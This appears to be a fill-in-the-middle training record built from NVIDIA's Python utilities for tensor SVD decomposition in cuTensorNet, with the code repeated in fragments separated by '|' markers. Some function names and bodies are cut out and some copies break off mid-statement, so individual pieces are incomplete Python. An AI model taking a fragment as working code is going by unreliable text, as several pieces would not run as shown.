logger.debug(f"The workspace memory (device pointer = {device_ptr}) has been set in the workspace descriptor.")
return workspace_ptr
elif workspace_size != 0:
# host workspace
logger.debug(f"Allocating host memory for {task_name}")
workspace_host = numpy.empty(workspace_size, dtype=numpy.int8)
logger.debug(f"Finished allocating host memory of size {formatters.MemoryStr(workspace_size)} for decomposition.")
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, workspace_host.ctypes.data, workspace_size)
logger.debug(f"The workspace memory (host pointer = {workspace_host.ctypes.data}) has been set in the workspace descriptor.")
return workspace_host
else:
return None
def _destroy_tensor_descriptors(desc_tensors):
for t in desc_tensors:
if t is not None:
cutn.destroy_tensor_descriptor(t)
def | (handle, wrapped_operands, size_dict, inputs, outputs, mid_extent, method, device_id, stream_ctx, logger):
"""
Create empty tensor operands and corresponding tensor descriptors for a decomposition problem.
"""
# Create input tensor descriptors, output operands and output tensor descriptors
output_class = wrapped_operands[0].__class__
dtype_name = wrapped_operands[0].dtype
# Compute extents for the outputs
shared_mode_out = list(set(outputs[0]) & set(outputs[1]))[0]
output_extents = [tuple(size_dict[m] if m != shared_mode_out else mid_extent for m in modes) for modes in outputs]
logger.debug("Creating input tensor descriptors.")
input_tensor_descriptors = []
output_tensor_descriptors = []
try:
for (t, modes) in zip(wrapped_operands, inputs):
input_tensor_descriptors.append(t.create_tensor_descriptor(handle, modes))
logger.debug("The input tensor descriptors have been created.")
# Create the output in the context of the current stream to work around a performance issue with CuPy's memory pool.
logger.debug("Beginning output tensors and descriptors creation...")
s = None
s_ptr = 0
output_operands = []
with utils.device_ctx(device_id):
for extent, tensor_modes in zip(output_extents, outputs):
operand = utils.create_empty_tensor(output_class, extent, dtype_name, device_id, stream_ctx)
output_operands.append(operand)
output_tensor_descriptors.append(operand.create_tensor_descriptor(handle, tensor_modes))
if hasattr(method, 'partition') and method.partition is None:
if dtype_name in ['float32', 'complex64']:
s_dtype_name = 'float32'
elif dtype_name in ['float64', 'complex128']:
s_dtype_name = 'float64'
else:
raise ValueError(f"{dtype_name} data type not supported")
s = utils.create_empty_tensor(output_class, (mid_extent, ), s_dtype_name, device_id, stream_ctx)
s_ptr = s.data_ptr
logger.debug("The output tensors and descriptors have been created.")
except:
_destroy_tensor_descriptors(input_tensor_descriptors)
_destroy_tensor_descriptors(output_tensor_descriptors)
raise
return input_tensor_descriptors, output_operands, output_tensor_descriptors, s, s_ptr
def get_return_operand_data(tensor, target_location):
"""
Given a wrapped tensor, fetch the return operand based on the target location.
"""
if tensor is None: # potentially for s
return tensor
if target_location == 'cpu':
return tensor.to('cpu')
else: # already on device
return tensor.tensor
| create_operands_and_descriptors | identifier_name |
decomposition_utils.py | # Copyright (c) 2023, NVIDIA CORPORATION & AFFILIATES
#
# SPDX-License-Identifier: BSD-3-Clause
"""
A collection of utility functions for decomposition.
"""
import logging
import numpy
from . import einsum_parser
from . import formatters
from . import tensor_wrapper
from . import typemaps
from . import utils
from .. import cutensornet as cutn
from .. import memory
DECOMPOSITION_DTYPE_NAMES = ('float32', 'float64', 'complex64', 'complex128')
#TODO: auto generate the maps below
PARTITION_MAP = {None: cutn.TensorSVDPartition.NONE,
'U': cutn.TensorSVDPartition.US,
'V': cutn.TensorSVDPartition.SV,
'UV': cutn.TensorSVDPartition.UV_EQUAL}
NORMALIZATION_MAP = {None: cutn.TensorSVDNormalization.NONE,
'L1': cutn.TensorSVDNormalization.L1,
'L2': cutn.TensorSVDNormalization.L2,
'LInf': cutn.TensorSVDNormalization.LINF}
SVD_ALGORITHM_MAP = {'gesvd': cutn.TensorSVDAlgo.GESVD,
'gesvdj': cutn.TensorSVDAlgo.GESVDJ,
'gesvdp': cutn.TensorSVDAlgo.GESVDP,
'gesvdr': cutn.TensorSVDAlgo.GESVDR}
SVD_ALGORITHM_MAP_TO_STRING = dict((val, key) for key, val in SVD_ALGORITHM_MAP.items())
SVD_METHOD_CONFIG_MAP = {'abs_cutoff': cutn.TensorSVDConfigAttribute.ABS_CUTOFF,
'rel_cutoff': cutn.TensorSVDConfigAttribute.REL_CUTOFF,
'partition': cutn.TensorSVDConfigAttribute.S_PARTITION,
'normalization': cutn.TensorSVDConfigAttribute.S_NORMALIZATION,
'algorithm': cutn.TensorSVDConfigAttribute.ALGO}
SVD_INFO_MAP = {'full_extent': cutn.TensorSVDInfoAttribute.FULL_EXTENT,
'reduced_extent': cutn.TensorSVDInfoAttribute.REDUCED_EXTENT,
'discarded_weight': cutn.TensorSVDInfoAttribute.DISCARDED_WEIGHT,
'algorithm': cutn.TensorSVDInfoAttribute.ALGO}
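# Illustrative sketch (not part of the original module): the reverse map built above
# turns a library enum value back into its user-facing string name.
def _example_reverse_algorithm_lookup():
    assert SVD_ALGORITHM_MAP_TO_STRING[cutn.TensorSVDAlgo.GESVDJ] == 'gesvdj'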
def compute_combined_size(size_dict, modes):
"""
Given the modes, compute the product of all extents using information in size_dict.
"""
size = 1
for mode in modes:
size *= size_dict[mode]
return size
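# Illustrative sketch (not part of the original module): with a hypothetical
# mode-extent map, the combined size is simply the product of the extents.
def _example_compute_combined_size():
    size_dict = {'a': 2, 'b': 3}
    assert compute_combined_size(size_dict, ('a', 'b')) == 6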
def parse_decomposition_subscripts(subscripts):
"""
Parse decomposition expression in string format, retaining ellipses if present.
"""
input_modes, *output_modes = subscripts.split("->")
if not output_modes:
raise ValueError("Output modes must be explicitly specified for decomposition")
if len(output_modes) > 1:
raise ValueError("subscripts must contain only 1 ->")
input_modes = input_modes.split(",")
output_modes = output_modes[0].split(",")
if len(output_modes) != 2:
raise ValueError("subscripts must specify the modes for both left and right tensors")
return input_modes, output_modes
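# Illustrative sketch (not part of the original module): a decomposition expression
# has a single input term and exactly two comma-separated output terms; the
# subscripts below are hypothetical.
def _example_parse_decomposition_subscripts():
    inputs, outputs = parse_decomposition_subscripts("ijk->ixj,xk")
    assert inputs == ["ijk"]
    assert outputs == ["ixj", "xk"]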
def compute_mid_extent(size_dict, inputs, outputs):
"""
Compute the expected mid extent given a size_dict and the modes for both inputs and outputs.
"""
size_dict = size_dict.copy() # this func will modify it in place
left_output = set(outputs[0])
right_output = set(outputs[1])
shared_mode_out = set(left_output) & set(right_output)
if len(shared_mode_out) != 1:
raise ValueError(f"Expected exactly one shared mode in the output tensors, found {len(shared_mode_out)}")
left_output -= shared_mode_out
right_output -= shared_mode_out
for _input in inputs:
left_extent = right_extent = remaining_extent = 1
left_modes = set()
right_modes = set()
for mode in _input:
extent = size_dict[mode]
if mode in left_output:
left_extent *= extent
left_modes.add(mode)
elif mode in right_output:
right_extent *= extent
right_modes.add(mode)
else:
remaining_extent *= extent
if right_extent * remaining_extent < left_extent:
# update left modes
left_mode_collapsed = left_modes.pop()
size_dict[left_mode_collapsed] = right_extent * remaining_extent
left_output -= left_modes
elif left_extent * remaining_extent < right_extent:
# update right modes
right_mode_collapsed = right_modes.pop()
size_dict[right_mode_collapsed] = left_extent * remaining_extent
right_output -= right_modes
left_extent = compute_combined_size(size_dict, left_output)
right_extent = compute_combined_size(size_dict, right_output)
return min(left_extent, right_extent)
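# Illustrative sketch (not part of the original module): splitting a single 3-mode
# tensor 'abc' (extents a=2, b=4, c=3) into 'ax' and 'xbc' is capped by the smaller
# side of the cut, so the expected mid extent is min(2, 4*3) == 2.
def _example_compute_mid_extent_single_input():
    size_dict = {'a': 2, 'b': 4, 'c': 3}
    inputs = [('a', 'b', 'c')]
    outputs = [('a', 'x'), ('x', 'b', 'c')]   # 'x' is the shared (mid) mode
    assert compute_mid_extent(size_dict, inputs, outputs) == 2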
def parse_decomposition(subscripts, *operands):
"""
Parse the generalized decomposition expression in string formats (unicode strings supported).
The modes for the outputs must be specified.
Returns wrapped operands, mapped inputs and output, size dictionary based on internal mode numbers,
the forward as well as the reverse mode maps, and the largest mid extent expected for the decomposition.
"""
inputs, outputs = parse_decomposition_subscripts(subscripts)
num_operand, num_input = len(operands), len(inputs)
if num_operand != num_input:
message = f"""Operand-term mismatch. The number of operands ({num_operand}) must match the number of inputs ({num_input}) specified in the decomposition expression."""
raise ValueError(message)
morpher = einsum_parser.select_morpher(False)
# First wrap operands.
operands = tensor_wrapper.wrap_operands(operands)
inputs = list(einsum_parser.parse_single(_input) for _input in inputs)
outputs = list(einsum_parser.parse_single(_output) for _output in outputs)
ellipses_input = any(Ellipsis in _input for _input in inputs)
num_ellipses_output = sum(Ellipsis in _output for _output in outputs)
if num_ellipses_output > 1:
raise ValueError(f"Ellipses found in {num_ellipses_output} output terms, only allowed in one at most.")
if ellipses_input:
if num_input == 1 and num_ellipses_output == 0:
raise ValueError("tensor.decompose does not support reduction operations")
einsum_parser.check_ellipses(inputs+outputs, morpher)
else:
if num_ellipses_output != 0:
raise ValueError("Invalid ellipsis specification. The output terms contain ellipsis while none of the input terms do.")
einsum_parser.check_einsum_with_operands(inputs, operands, morpher)
# Map data to ordinals for cutensornet.
num_extra_labels = max(len(o.shape) for o in operands) if ellipses_input else 0
all_modes, _, mode_map_user_to_ord, mode_map_ord_to_user, label_end = einsum_parser.map_modes(inputs + outputs, None, num_extra_labels, morpher)
mapper = einsum_parser.ModeLabelMapper(mode_map_ord_to_user)
mapping_morpher = einsum_parser.select_morpher(False, mapper)
# Replace ellipses with concrete labels
if ellipses_input:
if num_input == 1:
# For tensor.decompose only
n = len(operands[0].shape) - (len(inputs[0]) -1)
else:
num_implicit_modes = set()
for i, o in enumerate(operands):
_input = all_modes[i]
if Ellipsis not in _input:
continue
n = len(o.shape) - (len(_input) - 1)
assert n >= 0, "Internal error"
num_implicit_modes.add(n)
if len(num_implicit_modes) != 1:
#NOTE: Although we could allow an ellipsis to denote a different number of modes for each operand,
# we disable it here because the use case is limited, if it exists at all, and the implicit specification could cause confusion.
raise ValueError(f"Ellipsis for all operands must refer to equal number of modes, found {num_implicit_modes}")
n = num_implicit_modes.pop()
ellipses_modes = tuple(range(label_end-n, label_end))
for i, _modes in enumerate(all_modes):
if Ellipsis not in _modes:
continue
s = _modes.index(Ellipsis)
all_modes[i] = _modes[:s] + ellipses_modes + _modes[s+1:]
inputs = all_modes[:num_input]
outputs = all_modes[num_input:]
if num_input == 1:
contracted_modes_output = set(einsum_parser.infer_output_mode_labels(outputs))
if contracted_modes_output != set(inputs[0]):
raise ValueError("The contracted outcome from the right hand side of the expression does not match the input")
# Create mode-extent map based on internal mode numbers.
size_dict = einsum_parser.create_size_dict(inputs, operands)
# Compute the maximally allowed mid extent
mid_extent = compute_mid_extent(size_dict, inputs, outputs)
return operands, inputs, outputs, size_dict, mode_map_user_to_ord, mode_map_ord_to_user, mid_extent
def get_svd_config_info_scalar_attr(handle, obj_type, obj, attr, svd_algorithm=None):
"""
Get the data for given attribute of SVDConfig or SVDInfo.
"""
if obj_type == 'config':
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
return None
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_config_get_attribute
elif obj_type == 'info':
if attr != cutn.TensorSVDInfoAttribute.ALGO_STATUS:
dtype = cutn.tensor_svd_info_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDP):
return None
dtype = cutn.tensor_svd_algo_status_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_info_get_attribute
else:
raise ValueError("object type must be either config or info")
data = numpy.empty((1,), dtype=dtype)
getter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
return data
def set_svd_config_scalar_attr(handle, obj, attr, data, svd_algorithm=None):
"""
Set the data for given attribute of SVDConfig.
"""
setter = cutn.tensor_svd_config_set_attribute
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
raise ValueError(f"Algorithm specific parameters not supported for {svd_algorithm}")
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
if not isinstance(data, numpy.ndarray):
data = numpy.asarray(data, dtype=dtype)
setter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
def parse_svd_config(handle, svd_config, svd_method, logger=None):
|
def get_svd_info_dict(handle, svd_info):
"""
Parse the information in SVDInfo in a dictionary object.
"""
info = dict()
for key, attr in SVD_INFO_MAP.items():
info[key] = get_svd_config_info_scalar_attr(handle, 'info', svd_info, attr).item()
svd_algorithm = info['algorithm']
algo_status = get_svd_config_info_scalar_attr(handle, 'info', svd_info, cutn.TensorSVDInfoAttribute.ALGO_STATUS, svd_algorithm=svd_algorithm)
info['algorithm'] = SVD_ALGORITHM_MAP_TO_STRING[svd_algorithm]
if algo_status is not None:
for name in algo_status.dtype.names:
key = info['algorithm'] + f'_{name}'
info[key] = algo_status[name].item()
return info
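# Illustrative sketch (not part of the original module): the dictionary built above
# always carries the four keys from SVD_INFO_MAP, with 'algorithm' translated back
# to its string name, plus algorithm-prefixed entries whose exact field names come
# from the library-provided status struct. All values below are hypothetical.
_example_svd_info = {
    'full_extent': 16,
    'reduced_extent': 8,
    'discarded_weight': 0.01,
    'algorithm': 'gesvdj',
    # plus e.g. 'gesvdj_<field>': <value> for each field of the status struct
}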
def parse_decompose_operands_options(options, wrapped_operands, allowed_dtype_names=None):
"""
Given the initially wrapped tensors and the network options, move the wrapped operands to the device and create an internal NetworkOptions object.
If cutensornet library handle is not provided in `options`, one will be created in the internal options.
"""
device_id = utils.get_network_device_id(wrapped_operands)
logger = logging.getLogger() if options.logger is None else options.logger
operands_location = 'cuda'
if device_id is None:
operands_location = 'cpu'
device_id = options.device_id
logger.info(f"Begin transferring input data from host to device {device_id}")
wrapped_operands = tensor_wrapper.to(wrapped_operands, device_id)
logger.info("Input data transfer finished")
# initialize handle once if not provided
if options.handle is not None:
own_handle = False
handle = options.handle
else:
own_handle = True
with utils.device_ctx(device_id):
handle = cutn.create()
dtype_name = utils.get_operands_dtype(wrapped_operands)
if allowed_dtype_names is not None and dtype_name not in allowed_dtype_names:
raise ValueError(f"dtype {dtype_name} not supported")
compute_type = options.compute_type if options.compute_type is not None else typemaps.NAME_TO_COMPUTE_TYPE[dtype_name]
package = utils.get_operands_package(wrapped_operands)
allocator = options.allocator if options.allocator is not None else memory._MEMORY_MANAGER[package](device_id, logger)
internal_options = options.__class__(device_id=device_id,
logger=logger,
handle=handle,
blocking=options.blocking,
compute_type=compute_type,
memory_limit=options.memory_limit,
allocator=allocator)
return wrapped_operands, internal_options, own_handle, operands_location
def allocate_and_set_workspace(handle, allocator, workspace_desc, pref, mem_space, workspace_kind, device_id, stream, stream_ctx, logger, task_name=''):
"""
Allocate and set the workspace in the workspace descriptor.
"""
workspace_size = cutn.workspace_get_memory_size(handle, workspace_desc, pref, mem_space, workspace_kind)
# Allocate and set workspace
if mem_space == cutn.Memspace.DEVICE:
with utils.device_ctx(device_id), stream_ctx:
try:
logger.debug(f"Allocating device memory for {task_name}")
workspace_ptr = allocator.memalloc(workspace_size)
except TypeError as e:
message = "The method 'memalloc' in the allocator object must conform to the interface in the "\
"'BaseCUDAMemoryManager' protocol."
raise TypeError(message) from e
logger.debug(f"Finished allocating device memory of size {formatters.MemoryStr(workspace_size)} for decomposition in the context of stream {stream}.")
device_ptr = utils.get_ptr_from_memory_pointer(workspace_ptr)
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, device_ptr, workspace_size)
logger.debug(f"The workspace memory (device pointer = {device_ptr}) has been set in the workspace descriptor.")
return workspace_ptr
elif workspace_size != 0:
# host workspace
logger.debug(f"Allocating host memory for {task_name}")
workspace_host = numpy.empty(workspace_size, dtype=numpy.int8)
logger.debug(f"Finished allocating host memory of size {formatters.MemoryStr(workspace_size)} for decomposition.")
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, workspace_host.ctypes.data, workspace_size)
logger.debug(f"The workspace memory (host pointer = {workspace_host.ctypes.data}) has been set in the workspace descriptor.")
return workspace_host
else:
return None
def _destroy_tensor_descriptors(desc_tensors):
for t in desc_tensors:
if t is not None:
cutn.destroy_tensor_descriptor(t)
def create_operands_and_descriptors(handle, wrapped_operands, size_dict, inputs, outputs, mid_extent, method, device_id, stream_ctx, logger):
"""
Create empty tensor operands and corresponding tensor descriptors for a decomposition problem.
"""
# Create input tensor descriptors, output operands and output tensor descriptors
output_class = wrapped_operands[0].__class__
dtype_name = wrapped_operands[0].dtype
# Compute extents for the outputs
shared_mode_out = list(set(outputs[0]) & set(outputs[1]))[0]
output_extents = [tuple(size_dict[m] if m != shared_mode_out else mid_extent for m in modes) for modes in outputs]
logger.debug("Creating input tensor descriptors.")
input_tensor_descriptors = []
output_tensor_descriptors = []
try:
for (t, modes) in zip(wrapped_operands, inputs):
input_tensor_descriptors.append(t.create_tensor_descriptor(handle, modes))
logger.debug("The input tensor descriptors have been created.")
# Create the output in the context of the current stream to work around a performance issue with CuPy's memory pool.
logger.debug("Beginning output tensors and descriptors creation...")
s = None
s_ptr = 0
output_operands = []
with utils.device_ctx(device_id):
for extent, tensor_modes in zip(output_extents, outputs):
operand = utils.create_empty_tensor(output_class, extent, dtype_name, device_id, stream_ctx)
output_operands.append(operand)
output_tensor_descriptors.append(operand.create_tensor_descriptor(handle, tensor_modes))
if hasattr(method, 'partition') and method.partition is None:
if dtype_name in ['float32', 'complex64']:
s_dtype_name = 'float32'
elif dtype_name in ['float64', 'complex128']:
s_dtype_name = 'float64'
else:
raise ValueError(f"{dtype_name} data type not supported")
s = utils.create_empty_tensor(output_class, (mid_extent, ), s_dtype_name, device_id, stream_ctx)
s_ptr = s.data_ptr
logger.debug("The output tensors and descriptors have been created.")
except:
_destroy_tensor_descriptors(input_tensor_descriptors)
_destroy_tensor_descriptors(output_tensor_descriptors)
raise
return input_tensor_descriptors, output_operands, output_tensor_descriptors, s, s_ptr
def get_return_operand_data(tensor, target_location):
"""
Given a wrapped tensor, fetch the return operand based on the target location.
"""
if tensor is None: # potentially for s
return tensor
if target_location == 'cpu':
return tensor.to('cpu')
else: # already on device
return tensor.tensor
| """
Given an SVDMethod object, set the corresponding attributes in the SVDConfig.
"""
svd_algorithm = None
for method_attr, attr in SVD_METHOD_CONFIG_MAP.items():
data = getattr(svd_method, method_attr)
if method_attr == 'partition':
data = PARTITION_MAP[data]
elif method_attr == 'normalization':
data = NORMALIZATION_MAP[data]
elif method_attr == 'algorithm':
svd_algorithm = data = SVD_ALGORITHM_MAP[data]
set_svd_config_scalar_attr(handle, svd_config, attr, data)
if logger is not None:
logger.info(f"The SVDConfig attribute '{method_attr}' has been set to {data}.")
algo_params = svd_method._get_algo_params()
if algo_params is not None:
set_svd_config_scalar_attr(handle, svd_config, cutn.TensorSVDConfigAttribute.ALGO_PARAMS, algo_params, svd_algorithm=svd_algorithm)
if logger is not None:
logger.info(f"The SVDConfig attribute '{cutn.TensorSVDConfigAttribute.ALGO_PARAMS}' has been set to {algo_params}.") | identifier_body |
decomposition_utils.py | # Copyright (c) 2023, NVIDIA CORPORATION & AFFILIATES
#
# SPDX-License-Identifier: BSD-3-Clause
"""
A collection of utility functions for decomposition.
"""
import logging
import numpy
from . import einsum_parser
from . import formatters
from . import tensor_wrapper
from . import typemaps
from . import utils
from .. import cutensornet as cutn
from .. import memory
DECOMPOSITION_DTYPE_NAMES = ('float32', 'float64', 'complex64', 'complex128')
#TODO: auto generate the maps below
PARTITION_MAP = {None: cutn.TensorSVDPartition.NONE,
'U': cutn.TensorSVDPartition.US,
'V': cutn.TensorSVDPartition.SV,
'UV': cutn.TensorSVDPartition.UV_EQUAL}
NORMALIZATION_MAP = {None: cutn.TensorSVDNormalization.NONE,
'L1': cutn.TensorSVDNormalization.L1,
'L2': cutn.TensorSVDNormalization.L2,
'LInf': cutn.TensorSVDNormalization.LINF}
SVD_ALGORITHM_MAP = {'gesvd': cutn.TensorSVDAlgo.GESVD,
'gesvdj': cutn.TensorSVDAlgo.GESVDJ,
'gesvdp': cutn.TensorSVDAlgo.GESVDP,
'gesvdr': cutn.TensorSVDAlgo.GESVDR}
SVD_ALGORITHM_MAP_TO_STRING = dict((val, key) for key, val in SVD_ALGORITHM_MAP.items())
SVD_METHOD_CONFIG_MAP = {'abs_cutoff': cutn.TensorSVDConfigAttribute.ABS_CUTOFF,
'rel_cutoff': cutn.TensorSVDConfigAttribute.REL_CUTOFF,
'partition': cutn.TensorSVDConfigAttribute.S_PARTITION,
'normalization': cutn.TensorSVDConfigAttribute.S_NORMALIZATION,
'algorithm': cutn.TensorSVDConfigAttribute.ALGO}
SVD_INFO_MAP = {'full_extent': cutn.TensorSVDInfoAttribute.FULL_EXTENT,
'reduced_extent': cutn.TensorSVDInfoAttribute.REDUCED_EXTENT,
'discarded_weight': cutn.TensorSVDInfoAttribute.DISCARDED_WEIGHT,
'algorithm': cutn.TensorSVDInfoAttribute.ALGO}
def compute_combined_size(size_dict, modes):
"""
Given the modes, compute the product of all extents using information in size_dict.
"""
size = 1
for mode in modes:
size *= size_dict[mode]
return size
def parse_decomposition_subscripts(subscripts):
"""
Parse decomposition expression in string format, retaining ellipses if present.
"""
input_modes, *output_modes = subscripts.split("->")
if not output_modes:
raise ValueError("Output modes must be explicitly specified for decomposition")
if len(output_modes) > 1:
raise ValueError("subscripts must contain only 1 ->")
input_modes = input_modes.split(",")
output_modes = output_modes[0].split(",")
if len(output_modes) != 2:
raise ValueError("subscripts must specify the modes for both left and right tensors")
return input_modes, output_modes
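# Illustrative sketch (not part of the original module): the output terms are
# mandatory, so an expression without '->' is rejected with a ValueError.
def _example_subscripts_require_outputs():
    try:
        parse_decomposition_subscripts("ijk")
    except ValueError:
        pass  # expected: the output modes must be specified explicitly
    else:
        raise AssertionError("a missing '->' should have been rejected")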
def compute_mid_extent(size_dict, inputs, outputs):
"""
Compute the expected mid extent given a size_dict and the modes for both inputs and outputs.
"""
size_dict = size_dict.copy() # this func will modify it in place
left_output = set(outputs[0])
right_output = set(outputs[1])
shared_mode_out = set(left_output) & set(right_output)
if len(shared_mode_out) != 1:
raise ValueError(f"Expected exactly one shared mode in the output tensors, found {len(shared_mode_out)}")
left_output -= shared_mode_out
right_output -= shared_mode_out
for _input in inputs:
left_extent = right_extent = remaining_extent = 1
left_modes = set()
right_modes = set()
for mode in _input:
extent = size_dict[mode]
if mode in left_output:
left_extent *= extent
left_modes.add(mode)
elif mode in right_output:
right_extent *= extent
right_modes.add(mode)
else:
remaining_extent *= extent
if right_extent * remaining_extent < left_extent:
# update left modes
left_mode_collapsed = left_modes.pop()
size_dict[left_mode_collapsed] = right_extent * remaining_extent
left_output -= left_modes
elif left_extent * remaining_extent < right_extent:
# update right modes
right_mode_collapsed = right_modes.pop()
size_dict[right_mode_collapsed] = left_extent * remaining_extent
right_output -= right_modes
left_extent = compute_combined_size(size_dict, left_output)
right_extent = compute_combined_size(size_dict, right_output)
return min(left_extent, right_extent)
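# Illustrative sketch (not part of the original module): for a hypothetical
# contract-and-decompose problem ij,jk->ix,xk with extents i=4, j=3, k=5, the mid
# extent is limited by the contracted bond j, so the expected value is 3.
def _example_compute_mid_extent_two_inputs():
    size_dict = {'i': 4, 'j': 3, 'k': 5}
    inputs = [('i', 'j'), ('j', 'k')]
    outputs = [('i', 'x'), ('x', 'k')]   # 'x' is the shared (mid) mode
    assert compute_mid_extent(size_dict, inputs, outputs) == 3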
def parse_decomposition(subscripts, *operands):
"""
Parse the generalized decomposition expression in string formats (unicode strings supported).
The modes for the outputs must be specified.
Returns wrapped operands, mapped inputs and output, size dictionary based on internal mode numbers,
the forward as well as the reverse mode maps, and the largest mid extent expected for the decomposition.
"""
inputs, outputs = parse_decomposition_subscripts(subscripts)
num_operand, num_input = len(operands), len(inputs)
if num_operand != num_input:
message = f"""Operand-term mismatch. The number of operands ({num_operand}) must match the number of inputs ({num_input}) specified in the decomposition expression."""
raise ValueError(message)
morpher = einsum_parser.select_morpher(False)
# First wrap operands.
operands = tensor_wrapper.wrap_operands(operands)
inputs = list(einsum_parser.parse_single(_input) for _input in inputs)
outputs = list(einsum_parser.parse_single(_output) for _output in outputs)
ellipses_input = any(Ellipsis in _input for _input in inputs)
num_ellipses_output = sum(Ellipsis in _output for _output in outputs)
if num_ellipses_output > 1:
raise ValueError(f"Ellipses found in {num_ellipses_output} output terms, only allowed in one at most.")
if ellipses_input:
if num_input == 1 and num_ellipses_output == 0:
raise ValueError("tensor.decompose does not support reduction operations")
einsum_parser.check_ellipses(inputs+outputs, morpher)
else:
if num_ellipses_output != 0:
raise ValueError("Invalid ellipsis specification. The output terms contain ellipsis while none of the input terms do.")
einsum_parser.check_einsum_with_operands(inputs, operands, morpher)
# Map data to ordinals for cutensornet.
num_extra_labels = max(len(o.shape) for o in operands) if ellipses_input else 0
all_modes, _, mode_map_user_to_ord, mode_map_ord_to_user, label_end = einsum_parser.map_modes(inputs + outputs, None, num_extra_labels, morpher)
mapper = einsum_parser.ModeLabelMapper(mode_map_ord_to_user)
mapping_morpher = einsum_parser.select_morpher(False, mapper)
# Replace ellipses with concrete labels
if ellipses_input:
if num_input == 1:
# For tensor.decompose only
n = len(operands[0].shape) - (len(inputs[0]) -1)
else:
num_implicit_modes = set()
for i, o in enumerate(operands):
_input = all_modes[i]
if Ellipsis not in _input:
continue
n = len(o.shape) - (len(_input) - 1)
assert n >= 0, "Internal error"
num_implicit_modes.add(n)
if len(num_implicit_modes) != 1:
#NOTE: Although we could allow an ellipsis to denote a different number of modes for each operand,
# we disable it here because the use case is limited, if it exists at all, and the implicit specification could cause confusion.
|
n = num_implicit_modes.pop()
ellipses_modes = tuple(range(label_end-n, label_end))
for i, _modes in enumerate(all_modes):
if Ellipsis not in _modes:
continue
s = _modes.index(Ellipsis)
all_modes[i] = _modes[:s] + ellipses_modes + _modes[s+1:]
inputs = all_modes[:num_input]
outputs = all_modes[num_input:]
if num_input == 1:
contracted_modes_output = set(einsum_parser.infer_output_mode_labels(outputs))
if contracted_modes_output != set(inputs[0]):
raise ValueError("The contracted outcome from the right hand side of the expression does not match the input")
# Create mode-extent map based on internal mode numbers.
size_dict = einsum_parser.create_size_dict(inputs, operands)
# Compute the maximally allowed mid extent
mid_extent = compute_mid_extent(size_dict, inputs, outputs)
return operands, inputs, outputs, size_dict, mode_map_user_to_ord, mode_map_ord_to_user, mid_extent
def get_svd_config_info_scalar_attr(handle, obj_type, obj, attr, svd_algorithm=None):
"""
Get the data for given attribute of SVDConfig or SVDInfo.
"""
if obj_type == 'config':
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
return None
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_config_get_attribute
elif obj_type == 'info':
if attr != cutn.TensorSVDInfoAttribute.ALGO_STATUS:
dtype = cutn.tensor_svd_info_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDP):
return None
dtype = cutn.tensor_svd_algo_status_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_info_get_attribute
else:
raise ValueError("object type must be either config or info")
data = numpy.empty((1,), dtype=dtype)
getter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
return data
def set_svd_config_scalar_attr(handle, obj, attr, data, svd_algorithm=None):
"""
Set the data for given attribute of SVDConfig.
"""
setter = cutn.tensor_svd_config_set_attribute
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
raise ValueError(f"Algorithm specific parameters not supported for {svd_algorithm}")
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
if not isinstance(data, numpy.ndarray):
data = numpy.asarray(data, dtype=dtype)
setter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
def parse_svd_config(handle, svd_config, svd_method, logger=None):
"""
Given an SVDMethod object, set the corresponding attributes in the SVDConfig.
"""
svd_algorithm = None
for method_attr, attr in SVD_METHOD_CONFIG_MAP.items():
data = getattr(svd_method, method_attr)
if method_attr == 'partition':
data = PARTITION_MAP[data]
elif method_attr == 'normalization':
data = NORMALIZATION_MAP[data]
elif method_attr == 'algorithm':
svd_algorithm = data = SVD_ALGORITHM_MAP[data]
set_svd_config_scalar_attr(handle, svd_config, attr, data)
if logger is not None:
logger.info(f"The SVDConfig attribute '{method_attr}' has been set to {data}.")
algo_params = svd_method._get_algo_params()
if algo_params is not None:
set_svd_config_scalar_attr(handle, svd_config, cutn.TensorSVDConfigAttribute.ALGO_PARAMS, algo_params, svd_algorithm=svd_algorithm)
if logger is not None:
logger.info(f"The SVDConfig attribute '{cutn.TensorSVDConfigAttribute.ALGO_PARAMS}' has been set to {algo_params}.")
def get_svd_info_dict(handle, svd_info):
"""
Parse the information in SVDInfo in a dictionary object.
"""
info = dict()
for key, attr in SVD_INFO_MAP.items():
info[key] = get_svd_config_info_scalar_attr(handle, 'info', svd_info, attr).item()
svd_algorithm = info['algorithm']
algo_status = get_svd_config_info_scalar_attr(handle, 'info', svd_info, cutn.TensorSVDInfoAttribute.ALGO_STATUS, svd_algorithm=svd_algorithm)
info['algorithm'] = SVD_ALGORITHM_MAP_TO_STRING[svd_algorithm]
if algo_status is not None:
for name in algo_status.dtype.names:
